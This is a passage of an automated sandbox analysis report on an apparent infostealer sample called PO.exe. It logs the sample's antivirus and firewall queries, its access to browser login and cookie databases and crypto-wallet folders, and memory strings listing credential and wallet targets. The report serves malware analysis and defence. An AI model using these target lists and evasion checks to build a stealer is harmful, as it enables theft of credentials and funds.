                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018B2FE GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00175032 GetVersionExW,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                      Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
